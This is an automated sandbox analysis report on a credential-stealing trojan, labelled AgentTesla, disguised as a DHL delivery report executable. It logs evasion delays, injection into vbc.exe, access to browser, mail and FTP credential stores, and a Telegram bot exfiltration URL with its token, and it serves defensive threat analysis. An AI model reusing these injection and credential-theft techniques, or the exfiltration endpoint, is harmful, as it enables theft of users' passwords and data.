                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe TID: 6252Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe TID: 6448Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6532Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6508Thread sleep count: 4344 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6508Thread sleep count: 4125 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 4344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 4125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: vbc.exe, 00000002.00000002.636927086.0000000004E6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A102DB0 LdrInitializeThunk,2_2_0A102DB0
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 610000Jump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 612000Jump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 646000Jump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 648000Jump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5CE008Jump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 610000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 610000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeQueries volume information: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Dhl recent package delivery report needs attention.exe PID: 6256, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: Yara matchFile source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Dhl recent package delivery report needs attention.exe PID: 6256, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2728, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    1
                    Valid Accounts
                    211
                    Windows Management Instrumentation
                    1
                    Valid Accounts
                    1
                    Valid Accounts
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    114
                    System Information Discovery
                    Remote Services11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium1
                    Web Service
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    Access Token Manipulation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    Query Registry
                    Remote Desktop Protocol2
                    Data from Local System
                    Exfiltration Over Bluetooth11
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)311
                    Process Injection
                    2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    111
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    Automated Exfiltration2
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model1
                    Input Capture
                    Scheduled Transfer3
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Masquerading
                    LSA Secrets131
                    Virtualization/Sandbox Evasion
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Valid Accounts
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync1
                    Remote System Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job131
                    Virtualization/Sandbox Evasion
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)311
                    Process Injection
                    /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Dhl recent package delivery report needs attention.exe37%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    Dhl recent package delivery report needs attention.exe100%Joe Sandbox ML
                    No Antivirus matches
                    SourceDetectionScannerLabelLinkDownload
                    1.2.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1235971Download File
                    2.0.vbc.exe.610000.0.unpack100%AviraHEUR/AGEN.1203035Download File
                    2.0.vbc.exe.610000.4.unpack100%AviraHEUR/AGEN.1203035Download File
                    2.0.vbc.exe.610000.3.unpack100%AviraHEUR/AGEN.1203035Download File
                    1.0.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1235971Download File
                    2.0.vbc.exe.610000.1.unpack100%AviraHEUR/AGEN.1203035Download File
                    2.2.vbc.exe.610000.0.unpack100%AviraHEUR/AGEN.1203035Download File
                    2.0.vbc.exe.610000.2.unpack100%AviraHEUR/AGEN.1203035Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://www.smartassembly.com/webservices/Reporting/UploadReport2v0%Avira URL Cloudsafe
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://hEsAGj.com0%Avira URL Cloudsafe
                    https://dafa.fa0%Avira URL Cloudsafe
                    https://api.telegram.org4Hkp0%Avira URL Cloudsafe
                    http://www.smartassembly.com/webservices/Reporting/L0%Avira URL Cloudsafe
                    http://www.smartassembly.com/webservices/Reporting/UploadReport20%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    https://uyuDgc6hArJiFp.org0%Avira URL Cloudsafe
                    http://www.smartassembly.com/webservices/UploadReportLogin/0%URL Reputationsafe
                    http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocumentfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.smartassembly.com/webservices/Reporting/UploadReport2vDhl recent package delivery report needs attention.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        http://127.0.0.1:HTTP/1.1vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://hEsAGj.comvbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/Dhl recent package delivery report needs attention.exe, 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmpfalse
                          high
                          https://dafa.faDhl recent package delivery report needs attention.exe, 00000001.00000002.388770101.0000000002518000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.org4Hkpvbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.orgvbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.smartassembly.com/webservices/Reporting/LDhl recent package delivery report needs attention.exefalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.smartassembly.com/webservices/Reporting/UploadReport2Dhl recent package delivery report needs attention.exefalse
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocumentdocument-----vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwvbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://DynDns.comDynDNSnamejidpasswordPsi/Psivbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_meDhl recent package delivery report needs attention.exefalse
                                high
                                https://uyuDgc6hArJiFp.orgvbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://api.telegram.orgvbc.exe, 00000002.00000002.639895069.0000000006CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.smartassembly.com/webservices/UploadReportLogin/Dhl recent package delivery report needs attention.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURLDhl recent package delivery report needs attention.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    149.154.167.220
                                    api.telegram.orgUnited Kingdom
                                    62041TELEGRAMRUfalse
                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:626595
                                    Start date and time: 14/05/202215:09:372022-05-14 15:09:37 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 53s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Dhl recent package delivery report needs attention.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:21
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 1.1% (good quality ratio 0.6%)
                                    • Quality average: 43.4%
                                    • Quality standard deviation: 40.4%
                                    HCA Information:
                                    • Successful, ratio: 82%
                                    • Number of executed functions: 37
                                    • Number of non-executed functions: 2
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Adjust boot time
                                    • Enable AMSI
